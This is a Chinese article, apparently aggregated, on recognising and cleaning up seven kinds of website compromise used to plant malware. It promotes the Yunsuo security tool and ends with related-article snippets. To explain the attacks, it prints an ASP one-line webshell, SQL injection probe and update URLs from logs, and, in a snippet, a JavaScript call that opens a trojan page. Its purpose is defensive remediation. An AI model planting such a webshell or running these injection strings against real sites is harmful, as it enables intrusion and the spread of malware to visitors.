网站被黑挂马如何解决

1、 简单挂马

首页被挂马,登录网站后,杀毒软件报警,检查后,发现首页index.asp检查,底部出现,清理掉后,页面即正常,这种挂马主要以直接修改首页文件为主,容易发现和清理。

2、 网页后门挂马

登录网站任何页面都出现杀毒报警,按之前的方法查看index.asp,并且去掉了iframe语句。但却发现问题依然存在,于是查看其他文件才发现,所有文件全部加上了挂马语句,即使恢复了首页,但用户访问其他页面的时候依然会蹦出病毒提示。采用备份文件覆盖恢复,重装操作系统等方法都实验以后,隔天后可能再出现被挂马的情况,此时应怀疑属于网页后门导致,于是检查所有asp程序文件,攻击者往往会采用一些双扩展名的文件存放在,例如图片目录当中,xxxx.jpg.asp文件,打开来看代码类似于<%execute request("sb")%> 这样的语句,明显是一句话后门,从文件名来判断,这种伪装图片的后缀上来的文件,应怀疑是提交图片功能存在上传漏洞,建议停用或者采用云锁进行过滤和检查网页木马。

3、 数据库挂马

访问首页病毒报警,全盘查找,没有发现首页和其他文件被篡改,如果对比所有文件的md5,发现文件没有任何篡改的迹象,也就是说文件还是那些文件,为啥会出现挂马页面呢?可以考虑检查数据库中表单是否被挂马,网页木马并没有挂在文件里,而是挂在数据库内容里。原理是首页调用活动新闻的时候,从数据库里读出表单内容,形成网页,因此读取的地方被插入了挂马语句,通过日志分析可以看到类似sql注入漏洞的log:

http://www.aa.com/news.asp?id=8 '

http://www.aa.com/news.asp?id=8 and 1=1—

http://www.aa.com/news.asp?id=8 and 1=2--

可能最初会有一些探测语句。最后发现挂马的动作:

http://www.aa.com/news.asp?id=8 ‘ update news set ziduan='’ where id=8’

从此判断应该是news.asp存在注入问题,因此加入对变量类型判断和关键字过滤等工作,再将数据库中的挂马字段进行修改。可用云锁轻松拦截这些语句。

4、 文件调用挂马

应查看被调用的其他页面,常见的conn.asp等被包含的文件,有可能被插入后门,为啥修改这一个文件就能这么大威力呢?因为所有页面都调用了这个文件来连接数据库。文件可能会包含数据库的ip端口用户名及密码。此时应对数据库进行检查,例如数据库日志寻找一下是否有类似执行master..xp_cmdshell的记录,攻击者可能利用该扩展功能执行了系统命令来修改了文件,建议修改数据库口令,把数据库权限降到pubilc。将1433端口利用ipsec进行屏蔽,只允许本机访问。用云锁的防火墙功能进行拦截,并且可以扫描出被挂马的文件。

5、 arp挂马

用户反映访问网站的时候,杀毒软件提示病毒,但是登录服务器自己访问http://127.0.0.1或本地ip,却没有发现被挂马,但是所有用户通过域名去访问,就会有提示,可以通过服务器上进行抓包分析,检查是否能发现大量arp包,这种arp包通常是将服务器的mac地址转向另一个ip,利用arp协议进行挂马,这种情况的花需要在交换机上进行mac和ip地址绑定,在交换机上进行配置以后。

6、 域名劫持挂马

直接在服务器通过ip访问就正常,用户通过域名访问就是提示有病毒,此时ping 自己网站域名的时候,如果显示的ip和真实的不一样,需要赶紧查看域名解析是否被修改,登录域名管理后台,修改为正常的,并且修改管理密码。

7、 后台程序挂马

更新网页的后台程序,一般会使用一些熟悉的路径,例如:

http://www.xxx.com/admin/

http://www.xxx.com/login/

http://www.xxx.com/manage/

这种后台程序的链接虽然不公开给用户,但是经常容易被猜到,那么这种情况下,后台的用户名密码可以利用暴力破解的工具来穷举,理论上说破解只是时间问题,攻击者登录后台以后,就可以很方便的直接修改内容进行挂马,往往修改后台地址路径是个很费劲的工作,因为修改路径以后还需要考虑调整其他相关的程序,路径都要改成一致,可以利用云锁www.yunsuo.com.cn的重定向功能完成。

网页被植入恶意后门或者暗链、挂马,虽然看起来直接影响的是网站访问者,但实际上网站也会产生损失,例如搜索引擎的排名由于反复的中毒、关机重装导致迅速滑落位置,甚至有时候直接被提醒含有恶意代码,客户久而久之也会慢慢流逝,所以需要尽早利用云锁来解决这些问题。

时间: 2024-11-06 07:12:31

网站被黑挂马如何解决的相关文章

网站被黑挂马终极大总结 站长你造吗?

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 1. 简单挂马 首页被挂马,登录网站后,杀毒软件报警,检查后,发现首页index.asp检查,底部出现,清理掉后,页面即正常,这种挂马主要以直接修改首页文件为主,容易发现和清理. 2. 网页后门挂马 登录网站任何页面都出现杀毒报警,按之前的方法查看index.asp,并且去掉了iframe语句.但却发现问题依然存在,于是查看其他文件才发现,所

浅谈四步让站长查看自己网站是否被挂马

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 网站被挂马是站长最害怕的一件事.因为只要网站被挂马了,自然网站所有的因素都随之降低,而且挂马不及时处理,则可能导致网站直接被K掉,从而断取了从搜索引挚获取流量的源头.站长有三件最怕的事:一是挂马,二是挂暗链,三是网站被K.所以,对于网站被挂马则是让站长所做的努力全都白费掉了.毕竟网站被K后重新恢复原来的排名自然花费的精力努力都是非常大的.而且

热门视频网站成为黑客挂马攻击对象

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 据瑞星"云安全"系统统计,上周瑞星共截获了135万个挂马网址,主要是一些1158.html">在线视频.娱乐八卦和女性网站.近期,随着<变形金刚2>的热映与迈克尔·杰克逊病逝等事件成为广大网民关注的热点,大量网民访问视频网站收看预告片或追忆明星生前的经典影音,所以这些视频网站成为黑客挂马攻击对象

常见JS挂马方法及如何防止网站被黑客挂马?

一.常见JS挂马方法 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行. 这种方法使用的关键代码如下: window.open("http://www.mahaixiang.cn/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro ll

NBA明星个人网站被黑客挂马

本报讯 (记者 段郴群) 记者昨日获悉,据瑞星"云安全"系统监测, 6月29日,篮球网旗下的"科比中文网"."韦德中文网"."姚明中文网"等NBA著名球员的个人网站被黑客挂马.球迷访问这些网站后,会立即感染木马病毒Trojan.Win32.Generic.11E996E5(AV终结者木马),导致电脑异常,信息被盗. 瑞星安全专家提醒说,"云安全"系统在6月29日拦截了112万次挂马网站对用户的攻击.截至发稿

热门视频网站成黑客挂马攻击对象

据瑞星"云安全"系统统计,上周瑞星共截获了135万个挂马网址,主要是一些在线视频.娱乐八卦和女性网站.近期,随着<变形金刚2>的热映与迈克尔·杰克逊病逝等事件成为广大网民关注的热点,大量网民访问视频网站收看预告片或追忆明星生前的经典影音,所以这些视频网站成为黑客挂马攻击对象. 在这些挂马网站中截获的一个病毒值得注意,它是Trojan.Win32.FakeAV.ri(杀软伪造者木马),该病毒会修改系统文件,伪造成一个国外杀毒软件,欺骗用户电脑中有病毒,清除则需付费,使得部分用

周杰伦等名人网站频被挂马 粉丝上网需警惕

据瑞星"云安全"系统监测,4月28日,"周杰伦中文网"."中国保险网"."玉林百科"等网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Trojan.DL.Win32.Undef.dyf(安德夫木马下载器),导致用户个人信息被盗. 瑞星安全专家提醒说,近期一些明星大腕儿的个人网站.博客频繁被黑客挂马,27日张韶涵个人网站被挂马到目前为止仍未取消,这些明星具有大批量的忠实粉丝,所以对网民电脑安全带来了较大威胁. 据瑞星&quo

网站长期被挂马 访问者屡遭木马侵害

据瑞星"云安全"系统监测,6月3日,"星空剧场"."中国制造网"."北京市路政局房山公路分局"等视频.商务和政府网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Worm.Win32.VB.vl(VB代理蠕虫),导致文件受损并下载大量木马. 瑞星安全专家提醒说,近期发现像"博客大巴"."博尚"和一些高校地方信息网站存在长期被黑客挂马问题.由于安全技术的不足或其他因素,导致这些网站的访问

分享站长快速检测网站是否被挂马的三方法

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 网站被挂马或者被挂暗链说明网站的管理权限已落入他人之手,而且网站被挂马往往来给网站带来不可估量的负面影响,最常见的就是网站用户体验变形.网站被降权甚至是被K,而对于网站被马之后,很多站长都不能及时的发现并处理,导致网站出现状况后才有所感概.那么站长应该如何去防范这个网站最大的杀手呢?站长如何去检查自己的网站是否被挂马了呢?今天笔者以亲身经历来